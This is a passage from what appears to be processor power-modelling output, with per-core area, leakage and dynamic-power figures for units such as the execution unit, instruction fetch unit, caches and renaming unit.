Unit/Subthreshold Leakage with power gating': 0.408542, 'L2/Area': 4.53318, 'L2/Gate Leakage': 0.015464, 'L2/Peak Dynamic': 0.0505317, 'L2/Runtime Dynamic': 0.0135391, 'L2/Subthreshold Leakage': 0.834142, 'L2/Subthreshold Leakage with power gating': 0.401066, 'Load Store Unit/Area': 8.80969, 'Load Store Unit/Data Cache/Area': 6.84535, 'Load Store Unit/Data Cache/Gate Leakage': 0.0279261, 'Load Store Unit/Data Cache/Peak Dynamic': 3.4972, 'Load Store Unit/Data Cache/Runtime Dynamic': 1.10569, 'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675, 'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085, 'Load Store Unit/Gate Leakage': 0.0351387, 'Load Store Unit/LoadQ/Area': 0.0836782, 'Load Store Unit/LoadQ/Gate Leakage': 0.00059896, 'Load Store Unit/LoadQ/Peak Dynamic': 0.0731189, 'Load Store Unit/LoadQ/Runtime Dynamic': 0.0731189, 'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961, 'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918, 'Load Store Unit/Peak Dynamic': 3.84389, 'Load Store Unit/Runtime Dynamic': 1.53941, 'Load Store Unit/StoreQ/Area': 0.322079, 'Load Store Unit/StoreQ/Gate Leakage': 0.00329971, 'Load Store Unit/StoreQ/Peak Dynamic': 0.180299, 'Load Store Unit/StoreQ/Runtime Dynamic': 0.360597, 'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621, 'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004, 'Load Store Unit/Subthreshold Leakage': 0.591622, 'Load Store Unit/Subthreshold Leakage with power gating': 0.283406, 'Memory Management Unit/Area': 0.434579, 'Memory Management Unit/Dtlb/Area': 0.0879726, 'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729, 'Memory Management Unit/Dtlb/Peak Dynamic': 0.0639887, 'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0644165, 'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699, 'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485, 'Memory Management Unit/Gate Leakage': 0.00813591, 'Memory Management Unit/Itlb/Area': 0.301552, 'Memory Management Unit/Itlb/Gate Leakage': 0.00393464, 'Memory Management Unit/Itlb/Peak Dynamic': 0.331987, 'Memory Management Unit/Itlb/Runtime Dynamic': 0.0448131, 'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758, 'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842, 'Memory Management Unit/Peak Dynamic': 0.60111, 'Memory Management Unit/Runtime Dynamic': 0.10923, 'Memory Management Unit/Subthreshold Leakage': 0.0769113, 'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462, 'Peak Dynamic': 22.3836, 'Renaming Unit/Area': 0.369768, 'Renaming Unit/FP Front End RAT/Area': 0.168486, 'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731, 'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511, 'Renaming Unit/FP Front End RAT/Runtime Dynamic': 2.00155e-05, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925, 'Renaming Unit/Free List/Area': 0.0414755, 'Renaming Unit/Free List/Gate Leakage': 4.15911e-05, 'Renaming Unit/Free List/Peak Dynamic': 0.0401324, 'Renaming Unit/Free List/Runtime Dynamic': 0.0166548, 'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426, 'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987, 'Renaming Unit/Gate Leakage': 0.00863632, 'Renaming Unit/Int Front End RAT/Area': 0.114751, 'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343, 'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945, 'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.17093, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781, 'Renaming Unit/Peak Dynamic': 4.56169, 'Renaming Unit/Runtime Dynamic': 0.187605, 'Renaming Unit/Subthreshold Leakage': 0.070483, 'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779, 'Runtime Dynamic': 4.99848, 'Subthreshold Leakage': 6.21877, 'Subthreshold Leakage with power gating': 2.58311}, {'Area': 32.0201, 'Execution Unit/Area': 7.68434, 'Execution Unit/Complex ALUs/Area': 0.235435, 'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646, 'Execution Unit/Complex ALUs/Peak Dynamic': 9.4469e-07, 'Execution Unit/Complex ALUs/Runtime Dynamic': 0.20269, 'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111, 'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163, 'Execution Unit/Floating Point Units/Area': 4.6585, 'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156, 'Execution Unit/Floating Point Units/Peak Dynamic': 2.02403e-05, 'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033, 'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829, 'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061, 'Execution Unit/Gate Leakage': 0.120359, 'Execution Unit/Instruction Scheduler/Area': 1.66526, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.187504, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519, 'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913, 'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223, 'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562, 'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763, 'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.302436, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964, 'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262, 'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388, 'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608, 'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451, 'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.15266, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446, 'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.6426, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346, 'Execution Unit/Integer ALUs/Area': 0.47087, 'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291, 'Execution Unit/Integer ALUs/Peak Dynamic': 0.214446, 'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344, 'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222, 'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833, 'Execution Unit/Peak Dynamic': 4.24255, 'Execution Unit/Register Files/Area': 0.570804, 'Execution Unit/Register Files/Floating Point RF/Area': 0.208131, 'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788, 'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 3.82383e-06, 'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00786475, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968, 'Execution Unit/Register Files/Gate Leakage': 0.000622708, 'Execution Unit/Register Files/Integer RF/Area': 0.362673, 'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992, 'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0568717, 'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0581646, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675, 'Execution Unit/Register Files/Peak Dynamic': 0.0568755, 'Execution Unit/Register Files/Runtime Dynamic': 0.0660294, 'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387, 'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643, 'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912, 'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402, 'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.119813, 'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.321632, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543, 'Execution Unit/Runtime Dynamic': 1.63833, 'Execution Unit/Subthreshold Leakage': 1.79543, 'Execution Unit/Subthreshold Leakage with power gating': 0.688821, 'Gate Leakage': 0.368936, 'Instruction Fetch Unit/Area': 5.85939, 'Instruction Fetch Unit/Branch Predictor/Area': 0.138516, 'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00218605, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00218605, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00197094, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000799573, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045, 'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838, 'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732, 'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05, 'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602, 'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000835539, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733, 'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00717857, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282, 'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954, 'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758, 'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867, 'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0185694, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357, 'Instruction Fetch Unit/Gate Leakage': 0.0589979, 'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323, 'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05, 'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827, 'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0559151, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682, 'Instruction Fetch Unit/Instruction Cache/Area': 3.14635, 'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931, 'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.55668, 'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.17826, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386, 'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799, 'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493, 'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404, 'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.189913, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104, 'Instruction Fetch Unit/Peak Dynamic': 5.94781, 'Instruction Fetch Unit/Runtime Dynamic': 0.449836, 'Instruction Fetch Unit/Subthreshold Leakage': 0.932286, 'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843, 'L2/Area': 4.53318, 'L2/Gate Leakage': 0.015464, 'L2/Peak Dynamic': 0.0335487, 'L2/Runtime Dynamic': 0.0089839, 'L2/Subthreshold Leakage': 0.834142, 'L2/Subthreshold Leakage with power gating': 0.401066, 'Load Store Unit/Area': 8.80901, 'Load Store Unit/Data Cache/Area': 6.84535, 'Load Store Unit/Data Cache/Gate Leakage': 0.0279261, 'Load Store Unit/Data Cache/Peak Dynamic': 2.74279, 'Load Store Unit/Data Cache/Runtime Dynamic': 0.736561, 'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675, 'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085, 'Load Store Unit/Gate Leakage': 0.0350888, 'Load Store Unit/LoadQ/Area': 0.0836782, 'Load Store Unit/LoadQ/Gate Leakage': 0.00059896, 'Load Store Unit/LoadQ/Peak Dynamic': 0.048712, 'Load Store Unit/LoadQ/Runtime Dynamic': 0.0487119, 'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961, 'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918, 'Load Store Unit/Peak Dynamic': 2.97282, 'Load Store Unit/Runtime Dynamic': 1.0255, 'Load Store Unit/StoreQ/Area': 0.322079, 'Load Store Unit/StoreQ/Gate Leakage': 0.00329971, 'Load Store Unit/StoreQ/Peak Dynamic': 0.120115, 'Load Store Unit/StoreQ/Runtime Dynamic': 0.240231, 'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621, 'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004, 'Load Store Unit/Subthreshold Leakage': 0.591321, 'Load Store Unit/Subthreshold Leakage with power gating': 0.283293, 'Memory Management Unit/Area': 0.4339, 'Memory Management Unit/Dtlb/Area': 0.0879726, 'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729, 'Memory Management Unit/Dtlb/Peak Dynamic': 0.0426294, 'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0429123, 'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699, 'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485, 'Memory Management Unit/Gate Leakage': 0.00808595, 'Memory Management Unit/Itlb/Area': 0.301552, 'Memory Management Unit/Itlb/Gate Leakage': 0.00393464, 'Memory Management Unit/Itlb/Peak Dynamic': 0.221141, 'Memory Management Unit/Itlb/Runtime Dynamic': 0.0298772, 'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758, 'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842, 'Memory Management Unit/Peak Dynamic': 0.45048, 'Memory Management Unit/Runtime Dynamic': 0.0727895, 'Memory Management Unit/Subthreshold Leakage': 0.0766103, 'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333, 'Peak Dynamic': 17.2367, 'Renaming Unit/Area': 0.303608, 'Renaming Unit/FP Front End RAT/Area': 0.131045, 'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123, 'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468, 'Renaming Unit/FP Front End RAT/Runtime Dynamic': 9.80115e-06, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885, 'Renaming Unit/Free List/Area': 0.0340654, 'Renaming Unit/Free List/Gate Leakage': 2.5481e-05, 'Renaming Unit/Free List/Peak Dynamic': 0.0306032, 'Renaming Unit/Free List/Runtime Dynamic': 0.00845977, 'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144, 'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064, 'Renaming Unit/Gate Leakage': 0.00708398, 'Renaming Unit/Int Front End RAT/Area': 0.0941223, 'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242, 'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965, 'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0963126, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228, 'Renaming Unit/Peak Dynamic': 3.58947, 'Renaming Unit/Runtime Dynamic': 0.104782, 'Renaming Unit/Subthreshold Leakage': 0.0552466, 'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461, 'Runtime Dynamic': 3.30022, 'Subthreshold Leakage': 6.16288, 'Subthreshold Leakage with power gating': 2.55328}, {'Area': 32.0201, 'Execution Unit/Area': 7.68434, 'Execution Unit/Complex ALUs/Area': 0.235435, 'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646, 'Execution Unit/Complex ALUs/Peak Dynamic': 9.4469e-07, 'Execution Unit/Complex ALUs/Runtime Dynamic': 0.20269, 'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111, 'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163, 'Execution Unit/Floating Point Units/Area': 4.6585, 'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156, 'Execution Unit/Floating Point Units/Peak Dynamic': 2.02403e-05, 'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033, 'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829, 'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061, 'Execution Unit/Gate Leakage': 0.120359, 'Execution Unit/Instruction Scheduler/Area': 1.66526, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.187513, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519, 'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913, 'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223, 'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562, 'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763, 'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.302452, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964, 'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262, 'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388, 'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608, 'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451, 'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.152667, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446, 'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.642632, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346, 'Execution Unit/Integer ALUs/Area': 0.47087, 'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291, 'Execution Unit/Integer ALUs/Peak Dynamic': 0.214458, 'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344, 'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222, 'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833, 'Execution Unit/Peak Dynamic': 4.24257, 'Execution Unit/Register Files/Area': 0.570804, 'Execution Unit/Register Files/Floating Point RF/Area': 0.208131, 'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788, 'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 3.82383e-06, 'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00786514, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968, 'Execution Unit/Register Files/Gate Leakage': 0.000622708, 'Execution Unit/Register Files/Integer RF/Area': 0.362673, 'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992, 'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0568748, 'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0581675, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675, 'Execution Unit/Register Files/Peak Dynamic': 0.0568786, 'Execution Unit/Register Files/Runtime Dynamic': 0.0660327, 'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387, 'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643, 'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912, 'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402, 'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.119819, 'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.321648, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543, 'Execution Unit/Runtime Dynamic': 1.63838, 'Execution Unit/Subthreshold Leakage': 1.79543, 'Execution Unit/Subthreshold Leakage with power gating': 0.688821, 'Gate Leakage': 0.368936, 'Instruction Fetch Unit/Area': 5.85939, 'Instruction Fetch Unit/Branch Predictor/Area': 0.138516, 'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00218616, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00218616, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00197105, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000799617, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045, 'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838, 'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732, 'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05, 'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602, 'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000835581, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733, 'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00717896, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282, 'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954, 'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758, 'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867, 'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0185704, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357, 'Instruction Fetch Unit/Gate Leakage': 0.0589979, 'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323, 'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05, 'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827, 'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0559179, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682, 'Instruction Fetch Unit/Instruction Cache/Area': 3.14635, 'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931, 'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.55686, 'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.17827, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386, 'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799, 'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493, 'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404, 'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.189922, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104, 'Instruction Fetch Unit/Peak Dynamic': 5.948, 'Instruction Fetch Unit/Runtime Dynamic': 0.44986, 